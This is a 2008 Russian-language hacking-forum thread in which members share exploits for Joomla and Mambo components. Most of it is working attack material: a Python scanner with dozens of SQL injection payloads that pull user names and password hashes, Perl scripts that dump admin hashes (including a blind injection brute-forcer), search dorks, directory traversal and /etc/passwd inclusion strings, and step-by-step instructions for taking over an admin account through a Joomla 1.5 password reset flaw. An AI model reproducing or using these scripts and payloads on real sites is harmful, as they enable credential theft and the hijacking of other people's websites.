Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.07.2008, 00:22
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
MamScan v1.0
Mambo Component SQL scanner
Код:
#!/usr/bin/python
#Mambo Component SQL scanner, checks source for md5's
#Uncomment line 44 for verbose mode. If md5 found
#check manually.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, time
print "\n\t d3hydr8[at]gmail[dot]com MamScan v1.0"
print "\t------------------------------------------"
sqls = ["index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
"index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*",
"index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--",
"index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
"index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
"index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
"index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
"index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*", "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*",
"index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*",
"index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--",
"administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
"index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*",
"index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
"index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*",
"index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--",
"index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*",
"index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
"index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
"index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*",
"index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--"]
if len(sys.argv) != 2:
print "\nUsage: ./mamscan.py <site>"
print "Ex: ./mamscan.py www.test.com\n"
sys.exit(1)
host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
host = host+"/"
if host[:7] != "http://":
host = "http://"+host
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] Starting Scan...\n"
for sql in sqls:
time.sleep(3) #Change this if needed
#print "[+] Trying:",host+sql.replace("\n","")
try:
source = urllib2.urlopen(host+sql.replace("\n","")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
print "[!]",host+sql.replace("\n","")
for md5 in md5s:
print "\n[+]MD5:",md5
except(urllib2.HTTPError):
pass
print "\n[-] Done\n"
|
|
|
Joomla Component altas v 1.0 Multiple Remote SQL Injection |
05.07.2008, 14:06
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla Component altas v 1.0 Multiple Remote SQL Injection
Joomla Component altas v 1.0 Multiple Remote SQL Injection
Код:
#!/usr/bin/perl -w
#[*] Dork : index.php?option=com_altas
system("color f");
print "\t\t========================================================\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t========================================================\n\n";
use LWP::UserAgent;
print "\nEnter your Target (http://site.com/joomla/): ";
chomp(my $target=<STDIN>);
$uname="username";
$magic="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
# coded by Houssamix From H-T Team
# milw0rm.com [2008-07-04]
Последний раз редактировалось .Slip; 05.07.2008 в 14:54..
Причина: учимся пользоваться BB тегами
|
|
|
|
08.07.2008, 17:34
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Component Agora Forum 1.0.4 Acropolis rus
vuln code:
/moderate.php
PHP код:
$result = $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1');
vuln code:
/my_uploads.php
PHP код:
$db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE__, __LINE__, $db->error());
Download:
Код:
http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/
ZAMUT (c)
__________________
в строю
|
|
|
|
Joomla Component DT Register Remote SQL injection |
17.07.2008, 22:23
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla Component DT Register Remote SQL injection
Joomla Component DT Register Remote SQL injection
Код:
[*] Author: His0k4 [ALGERIAN HaCkeR]
[*] Dork: inurl:com_DTRegister eventId
[*] Vendor:http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12
UNION SELECT concat(username,0x3a,password) FROM
jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
# milw0rm.com [2008-07-16]
|
|
|
|
23.07.2008, 22:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Продукт-Joomla
Компонент -wap4joomla
found by ImpLex & Microsoft Sam
exploit
Код:
#!/usr/bin/perl -w
print
"\t\t
################################################################
############ This exploit created by ImpLex ICQ: 444-979 #######
############ from WHACK.RU #######
############ WHACK.RU #######
############ wapmain.php remote sql injection exploit #######
############ LETS GO!!!! #######
################################################################\n\n";
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
chomp(my $table1=<STDIN>);
print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
print "\n[+] User;password : $1";
print "\n[+] password = md5(md5:salt) or md5";
print "\n[+] target has been hacked";
print "\n[+] If password-md5(md5:salt) => Then user - admin";
print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
|
|
|
|
01.08.2008, 03:45
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
компонент com_imagebrowser
просматриваем директории на сервере
пример:
index.php?option=com_imagebrowser&folder=../../../../ |
|
|
|
Joomla Component EZ Store Blind SQL Injection Exploit |
04.08.2008, 14:07
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla Component EZ Store Blind SQL Injection Exploit
Joomla Component EZ Store Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"p"})
{
$pid = $options{"p"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-08-03]
|
|
|
|
12.08.2008, 19:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
Agora 1.0.4 Acropolis Rus
google-> inurl: option=com_agora
PHP код:
$task = trim( mosGetParam( $_REQUEST, 'task', "" ) );
if ($task)
{
require ($agora_path . "/$task.php");
}
else
{
require ($agora_path . "/index.php");
}
null байт не прокатит из-за trim, можно подключать аминские скритпты в которых нет проверки, единственный плюс обходим _VALID_MOS в скриптах,
также пригодится если на жертве есть другие скрипты или если кривые настройки на серваке пожно инклюдить скрипты у соседей |
|
|
|
13.08.2008, 00:41
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
null байт не прокатит из-за trim,
да щас прям - http://php.su/functions/?trim
../../../../../../../../etc/./passwd%00fucked_trim_bypass
|
|
|
|
Joomla 1.5.x Remote Admin Password Change |
13.08.2008, 16:17
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla 1.5.x Remote Admin Password Change
Joomla 1.5.x Remote Admin Password Change
Код:
File : /components/com_user/controller.php
#####################################################################################
Line : 379-399
function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );
// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
// Get the model
$model = &$this->getModel('Reset');
// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}
$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
global $mainframe;
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);
return true;
}
#####################################################################################
{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
# milw0rm.com [2008-08-12]
Последний раз редактировалось Rubaka; 13.08.2008 в 16:20..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
